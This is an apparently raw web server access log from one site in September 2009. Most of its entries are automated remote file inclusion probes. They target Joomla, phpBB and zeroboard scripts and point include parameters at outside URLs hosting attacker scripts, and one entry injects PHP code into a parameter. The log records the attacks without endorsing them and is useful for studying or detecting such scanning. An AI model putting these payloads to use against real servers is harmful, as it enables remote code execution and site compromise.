58.184.252.3 - - [16/Sep/2009:12:30:01 -0700] "GET /logs/access_080526.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:30:05 -0700] "GET ////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:30:07 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:30:12 -0700] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:30:12 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:30:12 -0700] "GET /logs/access_090815.log///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:30:12 -0700] "GET /logs/access_080329.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:30:15 -0700] "GET /logs/access_071123.log HTTP/1.0" 200 53071 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:30:17 -0700] "GET /logs/access_080517.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:30:19 -0700] "GET /logs/access_070916.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:30:22 -0700] "GET /logs/access_090117.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:25 -0700] "GET /logs/access_090810.log%20%20//class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:25 -0700] "GET /logs//class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:25 -0700] "GET /class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:28 -0700] "GET /logs//class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:28 -0700] "GET /class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:28 -0700] "GET /logs/access_090810.log%20%20//class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:34 -0700] "GET /logs/access_090305.log%20%20//class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:30:34 -0700] "GET /logs/access_090305.log%20%20//class_item.php?fileExtension=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:30:41 -0700] "GET /bikes/dteel/CreSTOC09/?S=D HTTP/1.0" 200 3481 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:31:29 -0700] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:31:29 -0700] "GET /logs///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:31:29 -0700] "GET /logs/access_090815.log///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:35 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:35 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:35 -0700] "GET /logs/access_090527.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:35 -0700] "GET /logs/access_080704.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:31:35 -0700] "GET /logs/access_090903.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:31:35 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:31:35 -0700] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:40 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:40 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:40 -0700] "GET /logs/access_090527.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:31:44 -0700] "GET /logs/access_080704.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:31:48 -0700] "GET /logs/access_080525.log%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:31:57 -0700] "GET /logs/access_090903.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:31:57 -0700] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:31:59 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:32:41 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:32:41 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:32:42 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:32:49 -0700] "GET /logs/access_090815.log%20%20///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:32:56 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.72.216 - - [16/Sep/2009:12:33:24 -0700] "GET /logs/access_090818.log%20%20///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:33:26 -0700] "GET /logs/access_080104.log%20%20//tools/send_reminders.php?includedir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:33:26 -0700] "GET /logs/access_080111.log%20%20//tools/send_reminders.php?includedir=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:34:11 -0700] "GET /logs/access_080912.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:34:11 -0700] "GET /logs/access_090525.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:34:31 -0700] "GET /logs/access_090815.log%20%20///components/com_virtuemart/export.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:32 -0700] "GET /logs/access_090810.log%20%20///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:33 -0700] "GET /logs///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 117497 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [16/Sep/2009:12:34:34 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:34 -0700] "GET //?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 19924 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:35 -0700] "GET /logs/access_090810.log%20%20///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:35 -0700] "GET /logs///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 117497 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:35 -0700] "GET //?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 19923 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:38 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:42 -0700] "GET /logs/access_090810.log%20%20///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:42 -0700] "GET //?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 19923 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:42 -0700] "GET /logs///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 117497 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:42 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:34:46 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:34:50 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:34:50 -0700] "GET /logs/access_090505.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.168.145.52 - - [16/Sep/2009:12:34:53 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:35:03 -0700] "GET /logs/access_081124.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:12:35:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:12:35:06 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:12:35:06 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:35:52 -0700] "GET /logs/access_080327.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:35:52 -0700] "GET /logs/access_080529.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:12:35:53 -0700] "GET /logs/access_080526.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:12:35:59 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:12:35:59 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.49.163 - - [16/Sep/2009:12:35:59 -0700] "GET /logs/access_090716.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:36:09 -0700] "GET /logs/access_090423.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:36:22 -0700] "GET /logs/access_090714.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:36:57 -0700] "GET /logs/access_090810.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:36:57 -0700] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 117497 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:36:58 -0700] "GET //?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 19903 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:36:58 -0700] "GET /logs/access_090810.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:36:59 -0700] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 117497 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:36:59 -0700] "GET //?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 19902 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:37:02 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:37:04 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:12:37:10 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:37:18 -0700] "GET ///skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:37:38 -0700] "GET /logs/access_081007.log/includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:37:38 -0700] "GET /includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:37:58 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:37:58 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:38:08 -0700] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:38:08 -0700] "GET /logs/access_081026.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:38:08 -0700] "GET /blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:38:11 -0700] "GET /logs/access_081007.log/includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:38:11 -0700] "GET /includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:12:38:11 -0700] "GET /logs/includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:38:21 -0700] "GET /logs/access_090613.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:38:28 -0700] "GET /logs/access_071112.log HTTP/1.0" 200 46565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:38:29 -0700] "GET /logs/access_071120.log HTTP/1.0" 200 34560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:38:32 -0700] "GET /logs/access_080905.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:38:38 -0700] "GET /logs/access_090324.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:01 -0700] "GET /logs/access_090810.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:02 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 117496 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [16/Sep/2009:12:39:03 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:04 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 19942 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:06 -0700] "GET /logs/access_090305.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:20 -0700] "GET /logs/access_090810.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:20 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 19941 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:20 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 117496 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:20 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 19941 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:20 -0700] "GET /logs/access_090810.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:20 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 200 117496 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:39:24 -0700] "GET /logs/access_081007.log/includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
